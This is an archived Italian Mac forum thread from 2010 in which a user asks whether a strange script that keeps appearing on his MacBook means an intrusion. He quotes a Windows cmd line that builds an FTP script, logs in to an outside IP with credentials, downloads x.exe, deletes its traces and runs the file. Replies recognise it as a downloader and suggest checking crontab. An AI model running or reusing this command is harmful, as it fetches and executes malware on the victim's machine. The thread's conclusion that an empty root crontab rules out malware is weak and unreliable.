PDA

Visualizza Versione Completa : Intrusione ?



esteban14
21-05-10, 11:16
Ciao a tutti,
è il mio primo msg, quindi chiedo venia se sbaglio qualcosa.
Ho un Macbook Pro in cui gira Tiger, da qualche giorno, io lo vedo alla sera quando ci smanetto, ad un certo punto da solo parte questo script:

cmd /c echo open 65.113.3.92 21 >> ik &echo user st_joe bw >> ik &echo binary >> ik &echo get x.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &x.exe &exit
cmd /c close

Se sto cliccando su una cartella, mi rinomina la cartello con il testo dello script, se sono in rete e sto ad esempio chattando, mi scrive lo script nel campo del testo.

Secondo voi è un'intrusione?

Ciao e grazie
Esteban

Peterpan
21-05-10, 11:23
Forse dovresti spiegare meglio. Effettivamente e' uno script che lancia un ftp e preleva un file eseguibile per windows.

Cosa fai quando parte ? Riesci a ricordare da quanto tempo fa questo e se puo' essere legato a qualche installazione o operazione particolare che hai fatto ?

Per verificare comunque perche' parte: apri il terminale e digita:

sudo crontab -l (inserisci la password)

e poi posta qui il risultato.

esteban14
21-05-10, 11:34
Quando parte lo script mi parte la sudorazione :), non faccio nulla, scrive il testo dove capita e si ferma.
Forse è iniziato dopo che ho aggiornato il programma per il TomTom.
Comunque seguo le tue indicazione e riporto il risultato.
Scusa la domanda da profano:
la password è quella utente? Nel caso io non abbia creato nessun utente lascio in bianco?

Grazie mille

Stefano

Peterpan
21-05-10, 11:37
La password e' quella dell'utente con privilegi di amministratore.

esteban14
24-05-10, 00:26
La password e' quella dell'utente con privilegi di amministratore.

Io non ho mai impostato nessuna password, come devo fare per avere privilegi da amministratore?

Votantonio
24-05-10, 00:40
Io credo che tu i privilegi di amministratore li abbia comunque se sei l'unico proprietario e amministratore del computer.
Una password di login comunque ci vuole, la puoi reimpostare da Preferenze di Sistema/Account/.

esteban14
24-05-10, 22:47
Ecco il risultato, sempre che abbia fatto le cose a modo:

Last login: Mon May 24 08:50:42 on console
Welcome to Darwin!
computer-di-utente:~ utente$ sudo crontab -l
Password:
crontab: no crontab for root
computer-di-utente:~ utente$

Votantonio
24-05-10, 22:50
Allora puoi stare tranquillo, non hai malware nel tuo Mac.
Resta da capire che diavolo sia quello script e perchè si comporta così.